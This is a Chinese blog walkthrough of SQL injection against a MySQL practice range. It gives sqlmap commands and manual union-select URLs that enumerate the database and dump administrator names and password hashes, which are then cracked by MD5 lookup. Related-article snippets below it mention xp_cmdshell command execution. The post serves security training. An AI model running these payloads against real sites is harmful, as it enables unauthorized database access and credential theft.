sql注入之mysql数据库(手工+工具)详解

最新推荐文章于 2024-06-03 11:53:43 发布
最新推荐文章于 2024-06-03 11:53:43 发布
阅读量457 收藏 1
点赞数
分类专栏: 实战集 文章标签: 安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42383069/article/details/104733889
版权

环境:sql注入靶场
首先判断一下注入点:http://219.153.49.228:43028/new_list.php?id=1
分别在后面加 and 2-1=1 和 and 2-1=2
在这里插入图片描述第一条语句执行后页面正常。
在这里插入图片描述第二条语句执行后页面错误。
由此可见,我们在后面添加的sql语句被带到了数据库中执行,说明这个存在注入

工具(sqlmap):

1.在sqlmap中查询数据库:

sqlmap.py -u "http://219.153.49.228:43028/new_list.php?id=1" --dbs

在这里插入图片描述
2.查询当前数据库:

sqlmap.py -u "http://219.153.49.228:43028/new_list.php?id=1" --current-db

在这里插入图片描述
3.查询库中存在的表:

sqlmap.py -u "http://219.153.49.228:43028/new_list.php?id=1" --tables -D mozhe_Discuz_StormGroup

在这里插入图片描述
4.查询表中的字段:

sqlmap.py -u "http://219.153.49.228:43028/new_list.php?id=1" --columns -T StormGroup_member -D mozhe_Discuz_StormGroup

在这里插入图片描述
5.查询字段里面的内容:

sqlmap.py -u "http://219.153.49.228:43028/new_list.php?id=1" --dump -C id,name,password -T StormGroup_member -D mozhe_Discuz_StormGroup

在这里插入图片描述
最后我们得到了管理员的账号密码,密码md5解密即可。

手工

1.使用order by 检测字段数,1-4页面返回正常,5的时候页面错误。由此可知字段数为4.
http://219.153.49.228:43028/new_list.php?id=1 order by 1-4
在这里插入图片描述
在这里插入图片描述
2.判断回显点:
http://219.153.49.228:43028/new_list.php?id=-1 union select 1,2,3,4 from StormGroup_member
注意:将id=1改为id=-1是为了不显示前面的内容而显示出后面的内容。
可知回显点为2和3
3.猜解用户名和密码带入得到数据:
http://219.153.49.228:43028/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member
在这里插入图片描述得到数据后将密码md5解密即可!
成功完成对mysql数据库的注入。

Beyond My
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入之mssql数据库
weixin_46476861的博客
02-19 252
mssql和access都是微软的,mysql和oracle都是Oracle的 sa = super administrator 超级管理员账户 拥有所有权限。 sa权限(利用sql注入可以远程执行命令) 这些语句都不用记 先确定有xp_cmdshell扩展程序才能用这些命令,没有的话就用恢复xp_cmdshell的命令 dbowner权限(利用sql注入可以做差异备份) dbowner权限不能用和恢复扩展存储,比如xp_cmdshell,它唯一的方法是
PHP、mysql手工注入)
10-12
PHP手工注入,全称MySQL手工SQL注入,是指攻击者通过输入恶意的SQL语句,利用应用程序对用户输入数据的不恰当处理,从而操控数据库,获取敏感信息或执行非授权操作。这种攻击方式通常发生在开发者未对用户输入进行...
Mysql之注入工具-yellowcong
01-21 2665
常用的sql注入工具,下面写了三种,1、sqliv;2sqlmap,3、havij(这款是界面的,不是脚本的那种扫描漏洞)。sqlmap这一款,这国内外都是很有名气的。 注入的url监测-- 通过这种方式 发现 这种类似url的网站 inurl:jsp?page= inurl:asp?id=sqliv准备必须先装好python和pip,才可以用sqliv下载#管网地址 https://github.
mysql sql注入工具_SQL注入工具实践
weixin_42353061的博客
02-07 986
程序简介超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。超级SQL注入工具目前支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。超级SQL注入工具采用C#开发,底层采用Socke...
2024三款最佳的MySQL SQL工具,DBA必备神器
最新发布
lgbingyu00的博客
06-03 1125
选择适合的 MySQL SQL 工具可以显著提高 DBA 的工作效率和数据库管理的质量。SQLynx、MySQL Workbench 和 Navicat for MySQL 是 2024 年最值得推荐的三款工具,每款工具都有其独特的优势和适用场景。根据具体需求和预算选择合适的工具,将帮助 DBA 更好地管理和优化 MySQL 数据库
SQL注入MYSQL注入
av11566的博客
04-19 7080
前言 MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。 必要知识 在MYSQL5.0以上版本中,MYSQL存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或者列名信息。 数据库中符号"
sql注入(4)mysql注入
c10udz的博客
04-13 4703
1.MySQL5.x结构框架 在MySQL 5.0以上版本中,为了方便管理,默认定义了information_schema数据 库,用来存储数据库元信息,其中经常用到的表有:schemata(记录数据库名),tables(记录表名),columns(列名或字段名) 在schemata表中,schema_name(记录数据库名) 在tables表中,table_schema(记录存储的数据库名),table_name(表名)(schema_name和table_name都记录了MySQL中所有的数据库
mysql sql注入工具_基础篇——SQL注入工具注入)
weixin_42460182的博客
01-19 527
注入工具上一篇介绍了SQL注入漏洞以及一些手工注入方法,本篇介绍一下注入工具1、sqlmapsqlmap属于比较经典的一个注入工具,功能强大,还自带一些绕过参数使用方法:sqlmap.py -u “url” 对url连接进行注入检测然后使用注入参数进行注入-u //添加url进行检测-dbs //进行数据库检测-tables //猜解数据库表-colums //猜解字段--level 1...
mssql,access,mysql手工注入详解
10-18
本文将深入探讨针对Microsoft SQL Server(MSSQL)、Access和MySQL数据库手工注入技术,帮助你理解其工作原理,防范潜在风险。 1. **MSSQL数据库注入** MSSQL注入通常发生在应用程序未能充分验证用户输入时。...
手工注入教程
09-06
"MySQL常规注入详解.docx"文档可能会涵盖以下内容:识别注入点、SQL注入的基本原理、测试SQL注入的方法、利用注入获取数据的技巧,以及如何避免和防御此类攻击。 接着是MySQL的报错注入。这种技术利用了服务器在...
SQL注入(bybx).docx
09-05
SQL注入攻击技术详解 SQL注入是一种常见的Web应用程序安全漏洞,它发生在Web应用程序对用户输入的参数未经充分过滤,直接进行数据库查询,从而使攻击者可以修改、查询或删除数据库中的数据,导致数据泄露或损坏。 ...
mysql注入工具;神器
08-25
mysql注入工具;神器mysql注入工具;神器mysql注入工具;神器mysql注入工具;神器mysql注入工具;神器mysql注入工具;神器mysql注入工具;神器mysql注入工具;神器mysql注入工具;神器mysql注入工具;神器mysql注入工具;神器mysql注入工具;神器mysql注入工具;神器
河马MySQL注入工具v1.1
05-11
河马MySQL注入工具v1.1,通过web前端应用获取数据库的内容。 support : UNION support : Error based
一个注入工具
07-31
一个注入工具,很好用,功能强大,全中文。找了好久才找到的
PHP+MySql注入工具
02-01
计算机学习PHP+MySql注入工具,放心用吧'_'
超级sql注入工具
11-02
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库
众测下的SQL注入挖掘.docx
07-09
SQL注入挖掘详解SQL注入是一种常见的网络安全漏洞,攻击者通过在输入参数中嵌入恶意SQL代码,以操控后台数据库,获取敏感信息或执行非法操作。在众测环境下,SQL注入的挖掘尤其重要,因为这有助于发现并修复...
Sqlmap(SQL注入自动化工具)
F2444790591的博客
07-16 3753
自动化SQL注入工具Sqlmap
mysqlsql注入
清风微醺的博客
04-18 2365
sql注入攻击实例mysql_SQL注入攻击案例 SQL注入案例 所谓的sql注入本质上还是执行sql语句 检测注入点 判断是否存在sql注入可能 判断当前表有多少字段 利用order by n select * from tag order by 2; order by n以第n个column排序,如果n大于表中字段个数会报错。 SQL注入常用爆库语句 爆库 SELECT * FROM `tag` where id = 3 union select 1,database(); 查询informat
48丨B+树:MySQL数据库索引是如何实现的?1
08-03
对于软件开发工程师而言,理解数据库索引的需求至关重要,特别是对于那些仅熟悉基础SQL语句的工程师。问题设定包括两点:一是功能性需求,如快速查询和插入;二是非功能性需求,如执行效率和存储空间优化,其中性能...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值